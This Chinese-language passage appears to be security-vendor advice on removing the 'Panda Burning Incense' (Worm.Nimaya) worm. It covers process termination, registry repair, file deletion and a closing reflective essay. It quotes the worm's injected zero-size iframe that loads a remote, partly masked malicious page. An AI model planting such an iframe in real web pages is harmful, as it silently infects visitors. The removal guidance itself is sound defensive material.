    该病毒会利用IE浏览器的漏洞进行攻击，因此用户应该给IE打好所有的补丁。如果必要的话，用户可以暂时换用Firefox、Opera等比较安全的浏览器。

第五、安装卡卡上网安全助手并开启“IE防漏墙”

    瑞星卡卡上网安全助手是瑞星公司开发的一款专业的反流氓软件工具，所有用户均可登陆瑞星网站http://tool.ikaka.com免费下载使用。
   
    卡卡助手中独创的“IE防漏墙”技术可有效阻止“熊猫烧香”等病毒及流氓软件利用IE、QQ、UC等漏洞侵入用户的计算机。安装卡卡助手后，屏幕右下角的托盘区会出现“IE防漏墙”的图标。



图四：IE防漏墙图标

    当用户访问的网站带有恶意代码时会自动弹出提示窗口，建议用户点击“阻止”按钮阻止病毒侵入。


图五：IE防漏墙阻止病毒入侵

“熊猫烧香”病毒疯狂肆虐 专家教你如何彻底清除
近一段时间，一个名为“熊猫烧香”（Worm.Nimaya）的病毒在互联网上疯狂肆虐。

    该病毒采用“熊猫烧香”头像作为图标，诱使用户运行。该变种会感染用户计算机上的EXE可执行文件，被病毒感染的文件图标均变为“熊猫烧香”。同时，受感染的计算机还会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码。一些网站编辑人员的电脑如果被该病毒感染，上传网页到网站后，就会导致用户浏览这些网站时也被病毒感染。目前多家著名网站已经遭到此类攻击，而相继被植入病毒。







一、使用瑞星杀毒软件清除

    由于现在海底光缆中断，很多国外杀毒软件难以升级，瑞星杀毒软件免费为用户提供三个月服务，任何用户均可登陆：http://www.rising.com.cn/free/index.htm 免费下载并使用。

    免费版本的瑞星杀毒软件与正式版本功能没有区别，安装时不需要输入序列号即可使用。

    安装后，请立即点击“升级”按钮，升级杀毒软件到最新版本，进行全盘杀毒。



[点击查看大图]

二、使用专杀工具清除

    针对该病毒，瑞星已经推出了专杀工具。没有安装杀毒软件的用户可登陆瑞星网站http://it.rising.com.cn/Channels/Service/2006-11/1163505486d38734.shtml免费下载使用。

    专杀工具采用瑞星独创的未知病毒查杀技术，可有效清除“熊猫烧香”病毒及其未知变种。



[点击查看大图]

三、手工清除

1、 清除内存中的病毒

    i. 由于该病毒会禁止“任务管理器”运行，可以使用第三方的进程管理工具，如Procview等结束病毒的进程。

    ii. 在进程列表中找到“spcolsv.exe”项，单击鼠标右键，选择“结束进程”。

    iii. 对于WindowsXP系统，可以直接点击“开始”-〉“运行”，输入“ntsd -c q -pn spcolsv.exe”结束病毒的进程。

2、修复注册表项目

    i. 运行regedit.exe，打开注册表编辑器。

    ii. 找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\Explorer\Advanced\Folder\Hidden\SHOWALL一项，将CheckedValue改成1。

    iii. 打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run，将svcshare的项目删除。

3、删除病毒文件

    i. 打开“我的电脑”，选择菜单“工具”-》“文件夹选项”，点击“查看”，取消“隐藏受保护的操作系统文件”前的对勾，并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”，然后点击“确定”。同时取消掉“隐藏已知类型文件的扩展名”前的对勾，然后点击“确定”。

    ii. 在硬盘的各个分区上点击鼠标右键，选择“打开”，切忌直接双击。




    iii. 删除根目录下的“setup.exe”（图标为“熊猫烧香”）和“autorun.inf”文件。

    iv. 进入系统目录下的drivers目录，默认为C:\windows\system32\drivers，将其下的spcolsv.exe文件删除。

    v. 重新启动计算机，检查这几个文件是否存在，如果不存在，则病毒已被清除干净。

4、恢复被病毒修改的网页文件

    搜索计算机上所有的网页文件，找到“<iframe src="http//www.ctv1**.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>”，将其删除。不同的变种加入的网址有所不同，建议采用杀毒软件进行清除操作。

5、修复被病毒感染的文件

    该病毒的一些变种会感染EXE可执行文件，因此建议使用杀毒软件或专杀工具清除该病毒。

熊猫启示录---风波过后的反思
随着“熊猫烧香”作者承诺不在更新新的版本，一场轰轰烈烈“杀猫”大战看似已经逐渐平静下来。但是这场风波带给我们的启示确不应该让大家这么快的忘记……

熊猫本身
在这个“金钱至上”的年代，“熊猫”确是一个非常另类的病毒。因为它的最终目的不是为得到经济利益。难道“熊猫”是回到早先的黑客们为录炫耀自己的技术而诞生的？或者是作者为了对早期黑客单纯目的表示敬意？但是从目前我们能看到的信息来看，作者的目的是对普通用户的一次警醒，更是对安全厂商的一次嘲弄！从技术上来说该病毒并没有什么创新之处，但是它却借鉴很多经典病毒，木马甚至是劫持软件的长处。这样一个没有尖端技术却拥有最成熟技术的病毒综合体来到我们面前。
“熊猫烧香”的名字的由来应该是被病毒感染后EXE文件图标会变成一个动态的在烧香熊猫。但是大家有没有想过作者为什么要如此煞费苦心的突出这个熊猫呢？而这个烧香熊猫到底如此“虔诚”的在祈求什么呢？这答案值得每个人细细品位。

用户
“熊猫”很厉害但是跟以往病毒大规模感染不同，用户明显分成2个阵营一个根本不知“熊猫”为何物一个被这只熊猫折磨的痛苦不堪。为什么会这样呢？感染熊猫后清除是极其麻烦的，显然没有什么机器能幸免，那问题一定都出在“防”上！“熊猫”犹如一柄石中剑，它考验用户的机器综合安全体系以及上网习惯。

厂商
面对反病毒技术没有突破性的进步，面对厂商的一次一次升级一次一次的广告攻势。面对用户的盲从。这只熊猫代来了“讽刺”也带来了答案！任何一个技术单一拿出来安全软件都能应付，但是综合到一起了呢？经济利益推动的升级在这只熊猫面前漏出本来的面目……熊猫不是卖点，它仅是测试,安全对软件的测试。

没有走远的熊猫
“熊猫烧香”作者承诺不在更新新的版本。但是不要指望你会摆脱它的困扰，因为有更有的“非标准”版本在酝酿而且更可怕并不是“熊猫“本身而是在病毒/木马制作思路上的变化，以后用多少新的病毒/木马会借鉴“熊猫”的经验呢？一切才刚刚开始！

应对
目前所有的下载网站杀毒软件的下载有非常热门，可见用户对其投入的关注度已经非常高。但是补丁，防火墙的下载却相对很少，这正体现目前用户安全防御上蹩脚走路的状况。但是以后要面对的将考验你安全上的综合措施，仅仅依靠一个或几个杀毒软件带给你的将不在是安全。